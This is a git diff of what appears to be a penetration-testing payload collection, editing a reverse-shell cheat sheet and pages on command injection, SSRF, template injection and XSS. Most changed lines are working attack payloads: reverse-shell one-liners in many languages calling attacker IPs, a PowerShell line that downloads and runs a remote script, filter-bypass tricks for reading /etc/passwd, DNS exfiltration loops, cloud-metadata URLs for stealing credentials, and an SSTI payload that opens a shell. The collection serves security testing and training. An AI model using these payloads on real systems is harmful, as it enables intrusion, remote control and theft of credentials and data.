diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index ba81b2d..371afdc 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -2,14 +2,14 @@ ## Reverse Shell Cheat Sheet -Bash TCP +### Bash TCP ```bash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196 ``` -Bash UDP +### Bash UDP ``` Victim: sh -i >& /dev/udp/127.0.0.1/4242 0>&1 @@ -19,7 +19,7 @@ nc -u -lvp 4242 ``` -Perl +### Perl ```perl perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' @@ -30,17 +30,17 @@ NOTE: Windows only perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ``` -Python +### Python ```python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` -PHP +### PHP ```bash php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' ``` -Ruby +### Ruby ```ruby ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' @@ -51,23 +51,23 @@ ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.pope ``` -Netcat Traditional +### Netcat Traditional ```bash nc -e /bin/sh [IPADDR] [PORT] ``` -Netcat OpenBsd +### Netcat OpenBsd ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f ``` -Ncat +### Ncat ```bash ncat 127.0.0.1 4444 -e /bin/bash ncat --udp 127.0.0.1 4444 -e /bin/bash ``` -Powershell +### Powershell ```powershell powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` @@ -81,14 +81,14 @@ powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40 powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1') ``` -Java +### Java ```java r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ``` -NodeJS +### NodeJS ```javascript (function(){ var net = require("net"), @@ -102,8 +102,28 @@ NodeJS }); return /a/; // Prevents the Node.js application form crashing })(); + + +or + +require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]') + +or + +-var x = global.process.mainModule.require +-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash') ``` +### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) +```javascript +String host="localhost"; +int port=8044; +String cmd="cmd.exe"; +Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); +``` +NOTE: Java reverse shell also work for Groovy + + ## Spawn TTY ``` /bin/sh -i diff --git a/README.md b/README.md index fcf8296..4cc0c5e 100644 --- a/README.md +++ b/README.md @@ -29,68 +29,40 @@ You might also like : * Tomcat CVE-2017-12617.py -## Tools -* [Kali Linux](https://www.kali.org/) -* [Web Developer](https://addons.mozilla.org/en-Gb/firefox/addon/web-developer/) -* [Hackbar](https://addons.mozilla.org/en-Gb/firefox/addon/hackbar/?src=search) - Not compatible with Firefox Quantum -* [Burp Proxy](https://portswigger.net) -* [Fiddler](https://www.telerik.com/download/fiddler) -* [DirBuster](https://sourceforge.net/projects/dirbuster/) -* [GoBuster](https://github.com/OJ/gobuster) -* [Knockpy](https://github.com/guelfoweb/knock) -* [SQLmap](http://sqlmap.org) -* [Nikto](https://cirt.net/nikto2) -* [Nessus](http://www.tenable.com/products/nessus-vulnerability-scanner) -* [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng) -* [Wappalyzer](https://wappalyzer.com/download) -* [Metasploit](https://www.metasploit.com/) -* [OpenVAS](http://www.openvas.org/) +## Try Harder +Ever wonder where you can use your knowledge ? The following list will help you find "targets" to improve your skills. +* __Bug Bounty Platforms__ + * [HackerOne](https://hackerone.com) + * [BugCrowd](https://bugcrowd.com) + * [Bounty Factory](https://bountyfactory.io) + * [Synack](https://www.synack.com/) + * [Intigriti](https://www.intigriti.com) + * [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/) +* __Online Platforms__ + * [Hack The Box](hackthebox.eu/) + * [Penetration test lab "Test lab" | Pentestit](https://lab.pentestit.ru) + * [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/) + * [Zenk-Security](https://www.zenk-security.com/epreuves.php) + * [Root-Me](https://www.root-me.org) + * [W3Challs](https://w3challs.com/) + * [NewbieContest](https://www.newbiecontest.org/) + * [Vulnhub](https://www.vulnhub.com/) + * [The Cryptopals Crypto Challenges](https://cryptopals.com/) + * [alert(1) to win](https://alf.nu/alert1) + * [Hacksplaining](https://www.hacksplaining.com/exercises) + * [HackThisSite](https://hackthissite.org) + * [Hackers.gg](hackers.gg) + * [Mind Map - Penetration Testing Practice Labs - Aman Hardikar](http://www.amanhardikar.com/mindmaps/Practice.html) -## Online Challenges -* [Hack The Box](hackthebox.eu/) -* [Root-Me](https://www.root-me.org) -* [Zenk-Security](https://www.zenk-security.com/epreuves.php) -* [W3Challs](https://w3challs.com/) -* [NewbieContest](https://www.newbiecontest.org/) -* [Vulnhub](https://www.vulnhub.com/) -* [The Cryptopals Crypto Challenges](https://cryptopals.com/) -* [Penetration Testing Practice Labs](http://www.amanhardikar.com/mindmaps/Practice.html) -* [alert(1) to win](https://alf.nu/alert1) -* [Hacksplaining](https://www.hacksplaining.com/exercises) -* [HackThisSite](https://hackthissite.org) -* [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/) -* [Hackers.gg](hackers.gg) - -## Bug Bounty -* [HackerOne](https://hackerone.com) -* [BugCrowd](https://bugcrowd.com) -* [Bounty Factory](https://bountyfactory.io) -* [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/) - -## Docker -| Command | Link | -| :------------- | :------------- | -| `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) | -| `docker pull paoloo/sqlmap` | [docker-sqlmap](https://hub.docker.com/r/paoloo/sqlmap/) | -| `docker pull kalilinux/kali-linux-docker` | [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-linux-docker/) | -| `docker pull owasp/zap2docker-stable` | [official OWASP ZAP](https://github.com/zaproxy/zaproxy) | -| `docker pull wpscanteam/wpscan` | [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) | -| `docker pull infoslack/dvwa` | [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/) | -| `docker pull danmx/docker-owasp-webgoat` | [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) | -| `docker pull opendns/security-ninjas` | [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) | -| `docker pull ismisepaul/securityshepherd` | [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) | -| `docker-compose build && docker-compose up` | [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) | -| `docker pull citizenstig/nowasp` | [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) | -| `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) | - - -## More resources -### Book's list: +## Book's list +Grab a book and relax, these ones are the best security books (in my opinion). * [Web Hacking 101](https://leanpub.com/web-hacking-101) +* [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec) * [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project) * [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn) * [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa) +* [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD) * [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE) * [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900) * [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit) @@ -104,16 +76,36 @@ You might also like : * [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html) * [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking) + +## More resources + ### Blogs/Websites -* http://blog.zsec.uk/101-web-testing-tooling/ -* https://blog.innerht.ml -* https://blog.zsec.uk -* https://www.exploit-db.com/google-hacking-database -* https://www.arneswinnen.net -* https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102 +* [BUG BOUNTY FIELD MANUAL: THE DEFINITIVE GUIDE FOR PLANNING, LAUNCHING, AND OPERATING A SUCCESSFUL BUG BOUNTY PROGRAM](https://www.hackerone.com/blog/the-bug-bounty-field-manual) +* [How to become a Bug Bounty Hunter - Sam Houston](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102) +* [Tips from Top Hackers – Bug Hunting methodology and the importance of writing quality submissions - Sam Houston](https://www.bugcrowd.com/tips-from-top-hackers-bug-hunting-methodology-and-the-importance-of-writing-quality-submissions/) +* [ARNE SWINNEN'S SECURITY BLOG JUST ANOTHER INFOSEC BLOG](https://www.arneswinnen.net) +* [XSS Jigsaw - innerht.ml](https://blog.innerht.ml) +* [ZeroSec Blog: Featuring Write-Ups, Projects & Adventures](https://blog.zsec.uk/tag/ltr101/) ### Youtube * [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4) * [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc) * [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8) * [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA) + + +### Docker +| Command | Link | +| :------------- | :------------- | +| `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) | +| `docker pull paoloo/sqlmap` | [docker-sqlmap](https://hub.docker.com/r/paoloo/sqlmap/) | +| `docker pull kalilinux/kali-linux-docker` | [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-linux-docker/) | +| `docker pull owasp/zap2docker-stable` | [official OWASP ZAP](https://github.com/zaproxy/zaproxy) | +| `docker pull wpscanteam/wpscan` | [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) | +| `docker pull infoslack/dvwa` | [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/) | +| `docker pull danmx/docker-owasp-webgoat` | [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) | +| `docker pull opendns/security-ninjas` | [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) | +| `docker pull ismisepaul/securityshepherd` | [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) | +| `docker-compose build && docker-compose up` | [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) | +| `docker pull citizenstig/nowasp` | [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) | +| `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) | \ No newline at end of file diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md index 0aa1f6b..3f09572 100644 --- a/Remote commands execution/README.md +++ b/Remote commands execution/README.md @@ -1,5 +1,6 @@ # Remote Commands Execution -Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server. +Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server. +NOTE: Reverse Shell Command are relocated to a [single file](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) ## Exploits @@ -87,6 +88,13 @@ Bypass blacklisted word with $@ who$@ami ``` +Bypass blacklisted word with variable expansion +```powershell +test=/ehhh/hmtc/pahhh/hmsswd +cat ${test//hhh\/hm/} +cat ${test//hh??hm/} +``` + Bypass zsh/bash/sh blacklist ```powershell echo $0 @@ -94,6 +102,12 @@ echo $0 echo whoami|$0 ``` +## Challenge +Challenge based on the previous tricks, what does the following command do: +```powershell +g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/} +``` + ## Time based data exfiltration Extracting data : char by char @@ -118,13 +132,9 @@ Based on the tool from https://github.com/HoLyVieR/dnsbin also hosted at dnsbin. for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done ``` -## Environment based -NodeJS Commands execution -```powershell -require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST') -``` ## Thanks to * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/) * [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136) * [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628) +* [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192) diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 07fb99e..132a69d 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -1,6 +1,23 @@ # Server-Side Request Forgery Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him. +## Summary +* [Exploit with localhost]() +* [Bypassing filters]() +* [SSRF via URL Scheme]() +* [SSRF to XSS]() +* [SSRF URL for Cloud Instances]() + * [SSRF URL for AWS Bucket]() + * [SSRF URL for Google Cloud]() + * [SSRF URL for Digital Ocean]() + * [SSRF URL for Packetcloud]() + * [SSRF URL for Azure]() + * [SSRF URL for OpenStack/RackSpace]() + * [SSRF URL for HP Helion]() + * [SSRF URL for Oracle Cloud]() + * [SSRF URL for Alibaba]() + + ## Exploit with localhost Basic SSRF v1 @@ -203,8 +220,9 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brut ``` - -## SSRF on AWS Bucket - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories) +## SSRF URL for Cloud Instances +### SSRF URL for AWS Bucket +[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories) Interesting path to look for at http://169.254.169.254 ``` Always here : /latest/meta-data/{hostname,public-ipv4,...} @@ -253,7 +271,7 @@ http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key ``` -## SSRF URL for Google Cloud +### SSRF URL for Google Cloud Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" ``` http://169.254.169.254/computeMetadata/v1/ @@ -275,7 +293,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/ ``` -## SSRF URL for Digital Ocean +### SSRF URL for Digital Ocean https://developers.digitalocean.com/documentation/metadata/ ```powershell curl http://169.254.169.254/metadata/v1/id @@ -291,12 +309,12 @@ All in one request: curl http://169.254.169.254/metadata/v1.json | jq ``` -## SSRF URL for Packetcloud +### SSRF URL for Packetcloud ``` https://metadata.packet.net/userdata ``` -## SSRF URL for Azure +### SSRF URL for Azure Limited, maybe more exist? https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/ ``` http://169.254.169.254/metadata/v1/maintenance @@ -308,19 +326,19 @@ http://169.254.169.254/metadata/instance?api-version=2017-04-02 http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text ``` -## SSRF URL for OpenStack/RackSpace +### SSRF URL for OpenStack/RackSpace (header required? unknown) ``` http://169.254.169.254/openstack ``` -## SSRF URL for HP Helion +### SSRF URL for HP Helion (header required? unknown) ``` http://169.254.169.254/2009-04-04/meta-data/ ``` -## SSRF URL for Oracle Cloud +### SSRF URL for Oracle Cloud ``` http://192.0.0.192/latest/ http://192.0.0.192/latest/user-data/ @@ -328,7 +346,7 @@ http://192.0.0.192/latest/meta-data/ http://192.0.0.192/latest/attributes/ ``` -## SSRF URL for Alibaba +### SSRF URL for Alibaba ``` http://100.100.100.200/latest/meta-data/ http://100.100.100.200/latest/meta-data/instance-id diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md index 46ffe66..01a835f 100644 --- a/Server Side Template injections/README.md +++ b/Server Side Template injections/README.md @@ -5,10 +5,11 @@ Recommended tool: [Tplmap](https://github.com/epinna/tplmap) e.g: ``` -./tplmap.py --os-shell -u 'http://www.target.com/page?name=John' +python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell +python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link" +python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade ``` - ## Ruby ### Basic injection ```python @@ -21,8 +22,8 @@ e.g: ``` -## Java -### Basic injection +## Java +### Basic injection ```java ${7*7} ${{7*7}} @@ -174,6 +175,13 @@ Inject this template {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host ``` +## AngularJS +### Basic injection +```javascript +$eval('1+1') +{{1+1}} +``` + ## Thanks to * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) * [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/) diff --git a/Web cache deception/README.md b/Web cache deception/README.md index c957dba..9bd5833 100644 --- a/Web cache deception/README.md +++ b/Web cache deception/README.md @@ -18,8 +18,9 @@ 5. The content of the cache is displayed ``` -[![IMAGE ALT TEXT HERE](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8) +[![YOUTUBE DEMO](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8) Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page ## Thanks to -* http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html \ No newline at end of file +* [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html) +* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning) \ No newline at end of file diff --git a/XSS injection/README.md b/XSS injection/README.md index aa5f418..2cfc371 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -644,6 +644,12 @@ Exotic payloads ## Common WAF Bypass +### Chrome Auditor - 9th august +```javascript +uxldz @@ -663,10 +669,10 @@ Use notification box instead of an alert - by [@brutelogic](https://twitter.com/ Note : it requires user permission ``` Notification.requestPermission(x=>{new(Notification)(1)}) - -Try here : https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)// ``` +Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//) + ## Thanks to * https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot diff --git a/XXE injections/Files/Classic XXE - etc passwd.xml b/XXE injection/Files/Classic XXE - etc passwd.xml similarity index 100% rename from XXE injections/Files/Classic XXE - etc passwd.xml rename to XXE injection/Files/Classic XXE - etc passwd.xml diff --git a/XXE injections/Files/Classic XXE B64 Encoded.xml b/XXE injection/Files/Classic XXE B64 Encoded.xml similarity index 100% rename from XXE injections/Files/Classic XXE B64 Encoded.xml rename to XXE injection/Files/Classic XXE B64 Encoded.xml diff --git a/XXE injections/Files/Classic XXE.xml b/XXE injection/Files/Classic XXE.xml similarity index 100% rename from XXE injections/Files/Classic XXE.xml rename to XXE injection/Files/Classic XXE.xml diff --git a/XXE injections/Files/Deny Of Service - Billion Laugh Attack b/XXE injection/Files/Deny Of Service - Billion Laugh Attack similarity index 100% rename from XXE injections/Files/Deny Of Service - Billion Laugh Attack rename to XXE injection/Files/Deny Of Service - Billion Laugh Attack diff --git a/XXE injections/Files/XXE OOB Attack (Yunusov, 2013).xml b/XXE injection/Files/XXE OOB Attack (Yunusov, 2013).xml similarity index 100% rename from XXE injections/Files/XXE OOB Attack (Yunusov, 2013).xml rename to XXE injection/Files/XXE OOB Attack (Yunusov, 2013).xml diff --git a/XXE injections/Files/XXE PHP Wrapper.xml b/XXE injection/Files/XXE PHP Wrapper.xml similarity index 100% rename from XXE injections/Files/XXE PHP Wrapper.xml rename to XXE injection/Files/XXE PHP Wrapper.xml diff --git a/XXE injections/Intruders/XXE_Fuzzing.txt b/XXE injection/Intruders/XXE_Fuzzing.txt similarity index 100% rename from XXE injections/Intruders/XXE_Fuzzing.txt rename to XXE injection/Intruders/XXE_Fuzzing.txt diff --git a/XXE injections/Intruders/xml-attacks.txt b/XXE injection/Intruders/xml-attacks.txt similarity index 100% rename from XXE injections/Intruders/xml-attacks.txt rename to XXE injection/Intruders/xml-attacks.txt diff --git a/XXE injections/README.md b/XXE injection/README.md similarity index 100% rename from XXE injections/README.md rename to XXE injection/README.md